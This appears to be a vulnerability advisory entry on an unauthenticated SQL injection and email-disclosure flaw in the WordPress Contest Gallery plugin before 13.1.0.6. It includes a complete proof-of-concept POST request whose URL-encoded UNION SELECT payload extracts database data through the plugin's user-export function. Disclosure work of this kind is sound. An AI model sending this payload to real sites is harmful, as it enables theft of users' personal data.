Lucene search

K
wpexploitTyler MillerWPEX-ID:45EE86A7-1497-4C81-98B8-9A8E5B3D4FAC
HistoryNov 01, 2021 - 12:00 a.m.

Contest Gallery < 13.1.0.6 - Missing Access Controls to Unauthenticated SQL injection / Email Address Disclosure

2021-11-0100:00:00
Tyler Miller
307

0.397 Low

EPSS

Percentile

97.3%

The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address

POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
Connection: close
Upgrade-Insecure-Requests: 1

cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true

0.397 Low

EPSS

Percentile

97.3%

Related for WPEX-ID:45EE86A7-1497-4C81-98B8-9A8E5B3D4FAC